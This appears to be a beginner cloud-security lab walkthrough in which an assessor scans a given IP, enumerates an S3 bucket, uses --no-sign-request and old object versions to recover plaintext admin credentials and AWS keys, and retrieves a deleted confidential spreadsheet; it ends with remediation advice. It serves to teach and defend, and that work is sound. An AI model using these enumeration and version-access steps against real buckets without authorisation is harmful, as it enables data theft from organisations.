Access Secrets with S3 Bucket Versioning
Description
We created this beginner-friendly lab to teach the potential dangers of S3 bucket versioning when admins have not sufficiently restricted who can access object versions, as well as the dangers of inadequate data segregation and of storing secrets in plain text fields. Advice on remediation is also included. Huge Logistics has engaged the services of your team to perform an external assessment of their cloud environment. You are tasked with assessing an IP range, including the IP address 16.171.123.169.
Lab prerequisites
- Basic Linux command line knowledge

Learning outcomes

- Basic web enumeration
- S3 bucket enumeration
- Identifying and accessing file versions using cURL and the AWS CLI
Difficulty
Foundations
Focus
Red
Starting point
Provided IP Address
Real-world context
S3 versioning can be very useful to guard against accidental file changes and deletions, and may even be mandated in some industries. Although AWS hasn't released any figures on the adoption of this feature, it's something worth checking for when examining buckets. Credentials stored in JavaScript files and other client-side code are a common, real-world security issue. Storing sensitive information such as API keys or credentials directly within JavaScript files exposes them to anyone who can access or view the website's source code, which is inherently public.
Submit Flag
Format: MD5 hash
Walkthrough
Attack
Enumeration
Running a scan against the IP address using Masscan

masscan -Pn 16.171.123.169 --top-ports 1000

reveals that TCP port 80 is open.
Running whatweb reveals that it's a login page.
Checking it in a browser we see the page below.
Requesting a non-existent page results in the 404 message below, which a StackOverflow discussion reveals is the default for Flask. Flask is a micro web framework written in Python that, depending on its configuration, can be vulnerable to a number of flaw classes, including server-side template injection (SSTI) and command injection.
Intercepting the request in Burp, we can try to discover other API endpoints, attempt to bypass authentication, or try SQL and command injection payloads. However, none of this was successful, so let's check the source code again.
Inspecting the page source code we see that it uses the S3 bucket huge-logistics-dashboard to host static website files.
The above is an example of the very common regional endpoint URL format but other URL formats are also possible.
- Path-Style URL (this format is deprecated but might still be in use by older buckets):
  https://s3.amazonaws.com/huge-logistics-data/files/auth.js
  This style was the original format for S3 URLs.

- Virtual Hosted-Style URL:
  https://huge-logistics-website.s3.amazonaws.com/static/index.html
  This format allows the bucket name to be part of the domain.

- Regional Endpoint URL (as in our example):
  https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/static/js/api.js
  This is a type of Virtual Hosted-Style URL that also includes the AWS region where the S3 bucket is located. Choosing the regional endpoint URL format can have benefits in latency, cost, compliance and data residency, as well as clarity.

- Dual Stack Endpoint URL (supports both IPv4 and IPv6):
  https://huge-logistics-media.s3.dualstack.us-west-1.amazonaws.com/customers.m4v

- S3 Transfer Acceleration URL:
  https://huge-logistics-data.s3-accelerate.amazonaws.com/backup-0810.zip
  Provides faster uploads and downloads for buckets with the feature enabled.

- S3 Access Point URL (assuming an access point named "invoice-access" and an account ID of "123456789012"):
  https://invoice-access-123456789012.s3-accesspoint.us-west-1.amazonaws.com/invoice-235573617.pdf
  S3 Access Points are named endpoints with distinct permissions.
Although our bucket URL includes the region, it's worth noting that we can use cURL to get the region a bucket was created in, for cases where another URL format is used. The cURL -I or --head parameter fetches the headers only.
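For example, a HEAD request against the bucket returns the region in the x-amz-bucket-region response header. The exact invocation below is a sketch using this lab's bucket name:

```shell
# Fetch only the response headers; S3 discloses the bucket's region
# in the x-amz-bucket-region header
curl -I https://huge-logistics-dashboard.s3.amazonaws.com/
```

This works even against the global (region-less) endpoint, which makes it handy when only a path-style or legacy URL is known.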
Returning to the bucket contents we can list the contents with the command below.
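The listing was likely done with an unauthenticated AWS CLI call along these lines (the exact flags are an assumption):

```shell
# List the bucket contents anonymously; --no-sign-request avoids signing
# the request with any locally configured credentials
aws s3 ls s3://huge-logistics-dashboard/ --recursive --no-sign-request
```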
We can check out the interestingly named auth.js. However, on inspection it's not too interesting from a security perspective.
However, using cURL to request the headers for the file is much more interesting! We see it return the header x-amz-version-id, which reveals that versioning is enabled on the S3 bucket. Amazon S3 versioning is a feature that can be enabled on S3 buckets to keep multiple versions of an object, including all writes and deletes, in the same bucket. Once versioning is enabled on a bucket, it cannot be disabled, only suspended (and objects versioned up to that point will keep their versions).
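The header check might look like this, using the object URL found in the page source:

```shell
# Fetch only the response headers for the object; the presence of an
# x-amz-version-id header indicates that bucket versioning is enabled
curl -I https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/static/js/auth.js
```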
Attempting to confirm this using the AWS CLI command get-bucket-versioning isn't successful.
aws s3api get-bucket-versioning --bucket huge-logistics-dashboard --no-sign-request
Neither is the first request to list object versions.
However, after adding --no-sign-request we see all file versions! The AWS CLI v2 attempts to sign all requests; the signature is a way to prove the identity of the requester. If the configured keys don't have permission to access the resource, the signed request will return an "Access Denied" error even if the bucket is public. To get around this we can use the --no-sign-request parameter.
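The successful listing was presumably an invocation along these lines:

```shell
# List every object version (current and non-current) anonymously
aws s3api list-object-versions --bucket huge-logistics-dashboard --no-sign-request
```

The truncated output below shows both current and non-current versions, including entries for a deleted spreadsheet and an older auth.js.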
    {
        "ETag": "\"d41d8cd98f00b204e9800998ecf8427e\"",
        "Size": 0,
        "StorageClass": "STANDARD",
        "Key": "private/",
        "VersionId": "LFkKXfYHprr7YC4BgFt5BbQPLLZWfu0B",
        "IsLatest": true,
        "LastModified": "2023-08-16T18:25:59.000Z",
        "Owner": {
            "ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
        }
    },
    {
        "ETag": "\"24f3e7a035c28ef1f75d63a93b980770\"",
        "Size": 24119,
        "StorageClass": "STANDARD",
        "Key": "private/Business Health - Board Meeting (Confidential).xlsx",
        "VersionId": "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8",
        "IsLatest": false,
        "LastModified": "2023-08-16T19:11:03.000Z",
        "Owner": {
            "ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
        }
    },
    {
        "ETag": "\"c3d04472943ae3d20730c1b81a3194d2\"",
        "Size": 244,
        "StorageClass": "STANDARD",
        "Key": "static/js/auth.js",
        "VersionId": "j2hElDSlveHRMaivuWldk8KSrC.vIONW",
        "IsLatest": true,
        "LastModified": "2023-08-12T20:43:43.000Z",
        "Owner": {
            "ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
        }
    },
    {
        "ETag": "\"7b63218cfe1da7f845bfc7ba96c2169f\"",
        "Size": 463,
        "StorageClass": "STANDARD",
        "Key": "static/js/auth.js",
        "VersionId": "qgWpDiIwY05TGdUvTnGJSH49frH_7.yh",
        "IsLatest": false,
        "LastModified": "2023-08-12T19:13:25.000Z",
        "Owner": {
            "ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
        }
    }
]
The deleted file Business Health - Board Meeting (Confidential).xlsx seems interesting, but attempting to access it is unsuccessful.
Lateral Movement
We've seen the contents of the current auth.js file already, so let's check out the previous version.
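With versioning enabled, a specific non-current version can be requested directly over HTTP by appending the versionId query parameter, using the version ID of the older auth.js from the listing above:

```shell
# Request the older (non-current) version of auth.js by its version ID
curl "https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/static/js/auth.js?versionId=qgWpDiIwY05TGdUvTnGJSH49frH_7.yh"
```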
    $(".btn-login").on("click", login);
});

function login(){
    email = $('#emailForm')[0].value;
    password = $('#passwordForm')[0].value;
    data = {'email':email, 'password':password};
    doLogin(data);
}

//Please remove this after testing. Password change is not necessary to implement so keep this secure!
function test_login(){
    data = {'email':'admin@huge-logistics.com', 'password':'H4mpturTiem213!'}
    doLogin(data);
}
Credentials in plain text! We use them to log in and access what seems to be a reporting dashboard on business performance.
The Notes section of the profile contains AWS keys...
After setting the keys with aws configure we try again to request the previous version of the now-deleted file. Success!
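The authenticated request likely looked something like this, using the deleted spreadsheet's version ID from the earlier listing (the local output filename is an assumption):

```shell
# With the discovered keys configured, retrieve the non-current version
# of the deleted spreadsheet by its version ID
aws s3api get-object --bucket huge-logistics-dashboard \
  --key "private/Business Health - Board Meeting (Confidential).xlsx" \
  --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 \
  board-meeting.xlsx
```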
Opening the spreadsheet we see a balance sheet and P&L account showing choppy waters... and of course the flag. PWNED!
Defense
The organization and segregation of data within an AWS S3 infrastructure are crucial for both operational efficiency and security. By keeping specific types of data in designated buckets, you ensure that the permissions related to data classification are appropriate. As we saw in this scenario, it was possible to access confidential data even though the original file was deleted from the bucket and we initially didn't have access to retrieve the file version, because the compromised web application contained credentials that could access the entire bucket and all file versions.
It's important to ensure that only trusted entities have the s3:ListBucketVersions and s3:GetObjectVersion permissions, as previous file versions may have been created mistakenly or during testing and may disclose sensitive data. The admin should also delete the dangling file version record using the command below.
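A remediation command along these lines, run with appropriately privileged credentials, would permanently remove the sensitive old version of auth.js (version ID taken from the earlier listing; the same approach applies to the spreadsheet's lingering version):

```shell
# Deleting by a specific version ID permanently removes that version,
# rather than just adding a delete marker
aws s3api delete-object --bucket huge-logistics-dashboard \
  --key "static/js/auth.js" \
  --version-id qgWpDiIwY05TGdUvTnGJSH49frH_7.yh
```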
Storing AWS credentials in text fields in applications is a bad practice that can lead malicious actors to move laterally and vertically from the initial point of compromise. AWS Secrets Manager, other secret management or privileged access management (PAM) software can be used instead.
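For instance, instead of embedding credentials in client-side code, a backend could fetch them at runtime from AWS Secrets Manager. A minimal sketch, assuming a hypothetical secret named prod/dashboard/admin:

```shell
# Retrieve a secret value at runtime instead of hard-coding it;
# the secret name prod/dashboard/admin is a hypothetical example
aws secretsmanager get-secret-value \
  --secret-id prod/dashboard/admin \
  --query SecretString --output text
```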
Further reading
https://hackerone.com/reports/991718